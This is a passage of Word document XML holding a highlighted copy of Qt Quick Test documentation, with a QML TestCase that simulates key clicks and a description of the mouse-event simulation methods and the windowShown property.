          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>50</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focus</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true</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TestCase</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name</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"KeyClick"</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when</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windowShown</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302D13">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> test_key_click</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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keyClick</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId1953" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Key_Left</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">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keyClick</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"a"</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="002E1325"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02D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="002E1325"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E1325">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="002E1325" w:rsidRDefault="00302D13" w:rsidP="00302D13">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2E1325">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="002E1325" w:rsidRDefault="00302D13" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00302D13" w:rsidRDefault="00302D13" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1954" w:anchor="mousePress-method" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>mousePress()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1955" w:anchor="mouseRelease-method" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>mouseRelease()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1956" w:anchor="mouseClick-method" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>mouseClick()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1957" w:anchor="mouseDoubleClick-method" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>mouseDoubleClick()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1958" w:anchor="mouseDoubleClickSequence-method" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>mouseDoubleClickSequence()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1959" w:anchor="mouseMove-method" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>mouseMove()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">methods can be used to </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simulate mouse events</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a similar fashion.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00302D13" w:rsidRDefault="00302D13" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">keyboard and mouse events can only be delivered once the main window has been shown. Attempts to deliver events before then will </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fail</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Use the</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1960" w:anchor="when-prop" w:history="1">
        <w:r w:rsidRPr="001E089F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>when</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1961" w:anchor="windowShown-prop" w:history="1">
        <w:r w:rsidRPr="001E089F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>windowShown</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">properties </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to track</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when the main window</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> has been </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shown</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00302D13" w:rsidRDefault="00302D13" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See also</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1962" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SignalSpy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1963" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Test Reference Documentation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00111EA1" w:rsidRPr="003D69BA" w:rsidRDefault="00111EA1" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001E089F" w:rsidRPr="003D69BA" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
